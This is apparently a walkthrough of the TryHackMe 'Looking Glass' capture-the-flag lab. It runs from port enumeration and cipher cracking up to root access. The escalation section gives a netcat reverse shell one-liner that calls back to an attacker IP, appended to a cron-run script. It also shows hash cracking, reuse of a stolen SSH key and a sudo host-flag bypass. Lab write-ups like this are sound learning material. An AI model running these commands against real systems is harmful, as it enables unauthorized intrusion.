Today I am attempting the Looking Glass challenge from TryHackMe which is rated as a medium box. Not sure the tags give much away, but given the association with Alice, it should be quite a strange ride.
As always, lets scan all ports with nmap before moving on to do a full version scan.
Wow, that is just one page of ports, there are literally hundreds of them. I will try a service scan and see what that gives us:
All of these ports are ssh although they are using the dropbear sshd protocol, which is similar but mainly used for environments with low memory and processor resources, such as embedded systems.
SSH:
Connecting to any of the open ssh ports gives us an output of ‘Higher’ or ‘Lower’, this appears to be a clue to determine the correct port we need to use.
Trying to log into the lowest port from the scan gives us the output ‘Lower’ which does not make much sense. Thinking back the the clue, we are told that Looking Glass is a mirror, so it makes sense that we need to reverse the output, so Lower means we need to go Higher and iterate between high and low values to find the correct port.
After lots of iteration, we get the correct port and what appears to be an encrypted version of the Jabberwocky poem is displayed. At the bottom we are asked to enter a secret password, so one assumes that we need to crack the cypher.
Looking at the text, it basically follows the structure of the actual poem, so it is likely that it is using a rotation cipher such as ROT13 or a Vigenere cipher. ROT13 or any variation did not work; however, if we are to use Vigenere, we will need a decode key, which we do not have. There are sites out there which can try to brute force the key, which is what we will do.
The first few attempts did not work, so I increased the .Max Key Length’ to 20 and tried again.
This time we managed to decode it and the decryption key was calculated. We can now use the key to decrypt the whole poem.
At the bottom of the decrypted text we can see the secret message we have to enter into the terminal.
So this looks like a username and password, probably for the ssh credentials on port 22.
First we can grab the user.txt file, but there is something wrong here as the flag does not match the required format for TryHackMe. Ahhhh, its mirrored, so we need to reverse it back.
So, looking in the home directory we have some interesting files, mainly poem.txt and twasBrillig.sh.
The poem.txt file is just that, nothing else of interest in there.
The twasBrillig.sh is a bash script
This script just appears to output the poem using wall; however, it could be being called by a cron job.
Looking to see whether we can run any commands with elevated privileges, we can use the command ‘sudo -l -l’.
OK, so this is more interesting, we can run the command /sbin/reboot as root without a password. Let’s see if there are any cron jobs running:
So there is a cron job being run by user tweedledum which runs the /home/jabberwock/twasBrillig.sh we saw earlier. There is also a key clue here, in that the cron job only runs on reboot and guess what, we say from the sudo -l command that we can run this as root.
Privilege Escalation to Tweedledum:
So the attack vector is to overwrite the twasBrillig.sh file with a reverse shell, setup a listener on our attack machine and then reboot the remote machine. If all goes to plan, we should elevate to user Tweedledum.
For the reverse shell I will use a sh+ nc shell:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc [IPADDRESS] [PORT] >/tmp/fI will append the shell script to the twasBrillig.sh file:
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 10.9.6.68 4444 >/tmp/f' >> twasBrillig.shI will setup my listener to listen on port 4444, so we can catch the reverse shell. For information, I will be using Pwncat as the listener.
Reboot the machine with ‘sudo reboot’, after a short while when the remote machine has booted, we get our reverse shell and we have escalated to user tweedledum.
Looking in the home directory of Tweedledum, we can see some further interesting files:
Humptydumpty.txt
Using Hashes.com, I paste these into the hash identify and we can see that each line appears to be SHA256 with the exception of the last hash which is Hex encoded. I will try to use the same site to crack the hashes.
The last hash gives us a password which we assume is for Humptydumpty, so we can try and change to this user and this works, we are now user humptydumpty.
Changing to the users home directory, we see a poetry.txt file which appears to contain a dialog between Alice and others, so I guess following the last method, we need to escalate now to Alice.
On checking Alice’s home directory we can see some strange permission indicating that we can execute commands.
Changing to Alice’s directory we do now have permission to view the content; however, it appears that we can run commands on files:
Let’s see if we can get the ssh credentials:
That’s strange, the id-rsa key is owned by humptydumpty, anyway I will copy the id_rsa key to /home/humptydumpty and then download to my remote machine, we can them hopefully ssh in as Alice.
First we need to change the permissions of the id_rsa file to 600, which we can do using chmod.
chmod 600 id_rsa
As i prefer to use Pwncat due to the features, I will send a bash reverse shell back to my attack machine and use Pwncat to catch it
We are now Alice and we have a nice Pwncat shell, let’s look around her home directory:
There is a file called kitten.txt, but it really does not help that much. Time to upload an enumeration script. The one I will use is called Linux Smart Enumeration script:
Download it on your attack box using the quick one liner.
wget "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -O lse.sh;chmod 700 lse.shUpload it to /home/alice, I will use the upload function in Pwncat; however a simple http server will also serve the purpose.
Once uploaded change the permissions of the file to give executable rights.
chmod +x lse.shWe can then run the enumeration script, I will set the verbosity level to 1, so it will only detail important information and I will also pipe the output using tee to a file called lse.txt, so we can review the information.
./lse.sh -l 1 | tee lse.txtOk, so we get a lot of information, but I really like the way this script outputs the data in a very easy to understand way. So looking at the script:
Very quickly we can see that we can read the sudoers file which contains a key piece of information.
Although we cannot directly use sudo -l to find Alices sudo privileges as we do not know the password, we can see that see can run /bin/bash as root. Again, we cannot run this directly using sudo /bin/bash, but we can use the -h or host flag with sudo. From the information in the sudoers file we can see the host as ssalg-gnikool, which is looking-glass backwards. So to prove this we can run the following command:
sudo -h ssalg-gnikool -l -lThe -l flag lists the users privileges or you can use -l -l for longer format.
So our exploit is now clear, we can run the command the /bin/bash as root.
sudo -h ssalg-gnikool /bin/bash
All that is left to do is grab the root.txt flag and read the_end.txt file.
Another fantastic box, which I did struggle with and unfortunately forgot to reset my time, so ended up having to restart a few times. That said I certainly learnt a lot with this box, especially root privesc as this was not a method I had come across before.
A massive thank you to NinjaJc01 for this excellent challenge, I really enjoyed it.
